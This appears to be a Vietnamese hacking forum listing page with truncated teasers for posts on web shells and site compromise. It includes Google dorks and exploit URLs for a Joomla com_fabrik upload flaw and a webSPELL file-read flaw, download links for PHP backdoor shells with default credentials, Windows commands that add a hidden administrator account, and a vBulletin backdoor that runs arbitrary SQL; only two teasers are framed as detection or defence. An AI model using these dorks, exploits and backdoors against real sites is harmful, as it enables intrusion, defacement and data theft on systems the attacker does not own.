Up Shell khi đã có user pass database

_Trong loạt bài share này mình sẽ hướng dẫn bà toan cách sử lý khi trong tay có những cái mà quan trọng sau mà không biết ứng sử và sử lý nó ra sao + có trong tay data và user name nhưng ko biết cách kết nối vào để sử lý dữ liệu đó ra sao Đặt ra nhiều trường hợp ( biết vận động cái đầu chút ) nếu host dùng directadmin admin và koloxo thì vẫn có thể connect đc vào Mysql vẫn có thể update user và...

Xem Thêm

Ck_PyShell

Tool Name: Ck_pyShell Version: 1.1 Release: Beta Description: A Multipurpose Tool For Pen-Testing Coded With Python. Uses Various User Agents To Fuzz The Requesting URL for All Purpose. Can Detect Proxy Settings and connect via Proxy Automatically If Any Found! Version 1.1 Has Added Features, Supports Tab Completion Of Commands and...

Xem Thêm

Joomla Shell Upload Vulnerability

requirements:1.minduse this google dork to find vulnerable joomla sites ## google dork : inurl:index.php?option=com_fabrikafter open the sites replace with this address ##index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1for example ##"www.xyz.com/index.php" to "www.xyz.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1" after...

Xem Thêm

TOP 5 PHP Shells of 2012

1- b374km1n1 Modified by Newbie3viLc063s v.2012 mostly hackers used b374k shell for defacing and other works, here is latest version of  b374k m1n1, re coded by Newbie3viLc063 hackers. New fuctions in this shell : OpenDIR  Symlink SQLI Scan  Website Whois  Port-Scanner  WP Reset  Jomlaa Reset  CMS...

Xem Thêm

Mannu shell version 2 by Indishell

Mannu shell version 2 with some new features and modified interface look Download link: --==[[ http://www.mediafire.com/download.php?a72ttl7vtq1ldvs ]]==-- by default username: team password: indishell new Features in the shell are1.File uploader2.vbulletin admin password changer3.Joomla admin panel username/password changer4.Wordpress admin panel username/password changer5.Password protectedin...

Xem Thêm

XSS Shell

http://mrtrung.net/XSSShell039.zip or : http://www.mediafire.com/?8dixes4twz02ce3 ...

Xem Thêm

WebShell remote Configuration excution

webShell 4.O remote Configuration excution vulnerable url : http://website.com/picture.php?file=_mysql.php               Dorks : ext:php intitle:webSPELL v4.0             "inurl:/picture.php?file=" Find  vulnerable website and goto  http://website.com/picture.php?file=_mysql.php you'll...

Xem Thêm

"Testing Image collection" shell and files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"            intitle:"Testing Image Collections" Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections" now see search results in google or bing search .. select any site from search results and look for upload option Now...

Xem Thêm

Exidous CMD Shell

Connect to shell Connected XSA Tool Getting Username Going to that directory Dir ListingJust For Fun (/etc/passwd) Downloa...

Xem Thêm

[TUT] Up Shell bằng tamper data

bạn cần cài tamper data tại đây https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ ...

Xem Thêm

[TUT] Hack VPS từ Shell !

đầu tiên execute command trên con shell đó > net user l33t p4$sword /add l33t=username p4$sword=password Bây giờ để truy cập quản trị cho người sử dụng của bạn> excute command Code: net localgroup administrators l33t /add  Sau đó thực hiện kết nối tới VPS Nếu VPS một ip tĩnh nhưng không kết...

Xem Thêm

Phương pháp phát hiện và loại bỏ shell trong Database!

Có nhiều bạn hỏi tôi cách để phát hiện shell khi hacker include vào Database? Hôm nay tôi làm tut này để trả lời câu hỏi trên và giúp các bạn nhận thức thêm về vấn đề bảo mật.Trước hết ta phải biết cách thức mà hacker include vào Data thế nào thì sau đó mới có phương pháp để loại bỏ triệt để. Tôi xin nói thêm trong vbb những table có...

Xem Thêm

Phương pháp include shell trong source VBB và cách phòng chống

Mình viết bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu. Viết tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện...

Xem Thêm

Hidden Baby cho vBulletin (all version)

Screenshot: Khả năng : Run query SQL tùy thích qua con backdoor (Select, Update, Drop ....) Cách sử dụng Quote: + Up thẳng vào thư mục forum vBB (ngang hàng với index.php). + Run: http://site.com/forum/backdoor.php?vnh= Câu lệnh sql hoặc + Admincp -> Product & Plugin Manager -> Add new plugin -> - Hook Location...

Xem Thêm